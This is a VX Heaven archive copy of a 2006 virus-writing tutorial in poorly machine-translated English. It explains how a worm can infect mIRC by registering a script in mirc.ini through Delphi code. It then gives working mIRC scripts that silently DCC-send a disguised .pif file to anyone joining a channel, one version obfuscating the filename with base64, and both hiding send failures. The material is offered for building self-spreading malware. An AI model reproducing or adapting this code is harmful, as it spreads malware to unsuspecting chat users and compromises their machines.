Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Virus infecting the mIRC

Hutley
Ready Rangers Liberation Front [7]
July 2006

[Back to index] [Comments]

Introduction

The mIRC (messenger Internet Relay Chat) is a program made by Khaled Mardam- Bey. It's the most popular program to have access the net of IRC.

Amongst other things as its easiness of use, the mIRC in it allows them that they are created "scripts" to automatize the execution of some tasks.

Another strong point in this excellent program it is the possibility of if sending any type of archive, not only for others mIRCs, but for all the other customers of IRC. ex. pIRCh, xIRCon, xChat, ect.

Soon, with as many easinesses and functions, it is not of if admiring the existence of virus that infecting this program.

We have everything in hands, the creation of scripts and the sending of archive.

In this simple text, i will show as to infect the mIRC creating one script for the direct sending of the archive.

Codes in delphi will be presented of as virus will go to make everything this. We also will be shown some examples of scripts

Old mIRCs

Old to add one script mirc, it was enough to create an archive with the commands. This archive must have the name script.ini and was alone to place it in the same folder where mirc was installed. Therefore in the next inicialization of tje mirc the script would go to be read automatically, it was not necessary to enter with any type of command.

New mIRCs and Scripts

For mircs new the thing is not so simple thus. When if script wants to add one is necessary to type the command "/load -rs nome.mrc". Typed command mirc will go to act of the following form:

previous example, the new script (novo.mrc) will be in next line with the one in this way: n3=novo.mrc.

Basically this is everything that our "program" will have to make. Below a stretch of routine in delphi is followed that it makes this procedure all.

  MircIni := TIniFile.Create(mIRCDir + 'mirc.ini');
// It creates an object INI and load the mirc.ini

  StrMirc := TStringList.Create;
// A StringList with the name of StrMirc creates

  MircIni.ReadSection('rfiles', StrMirc);
// Reads the section rfiles and put the values in the stringlist

  MircIni.WriteString('rfiles', 'n' + IntToStr(StrMirc.Count), 'novo.mrc');
// Write inside of mirc.ini in section rfiles the new entrance with the name novo.mrc

  MircIni.Free;
// It finishes the object liberating it of the memory
 

The part hard already is made. But before this it will be necessary to create the archive that will be script. This archive will be the responsible one to make the sending of virus for that they will be in mirc.

I will show the basic one of one script. The two will be in truth two scripts are equal in its actions, but what it will go to differentiate one of another one will be the present criptografy inside of the code, that mirc will be decoded only when it will be to read.

Let's go:

Script - With Criptography

on 1:JOIN:#:{
  if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ porn_in_msn.txt.pif
}
; It verifies if nick is equal to the one of victim, will be does not send for same itself

on 1:SENDFAIL:*:{ halt }
; It does not leave to appear acknowledgment of sending imperfections
 

Script - Without Criptography

on 1:JOIN:#:{
 if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ $decode(cG9ybl9pbl9tc24udHh0LnBpZg==,m)
}

on 1:SENDFAIL:*:{ halt }
 

Conclusion

As I said previously, these scripts and the example in delphi are basic. They are only for demonstrating that it is possible to make the thing and as to make it in basic way.

You are enough to develop these techniques and the sky will be the limit.

Ah, already it went forgetting me. To arrive itself at these codes in mirc, you are enough to use the command //echo -a $encode(text to encode,m). Mirc goes in the status of its and you it will see the text already codified, it has more information on codifications in mirc in its proper archive of help (mirc.hlp).

Good, this is everything.

Suggestions, critics: [email protected] - www.hutley.cjb.net

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua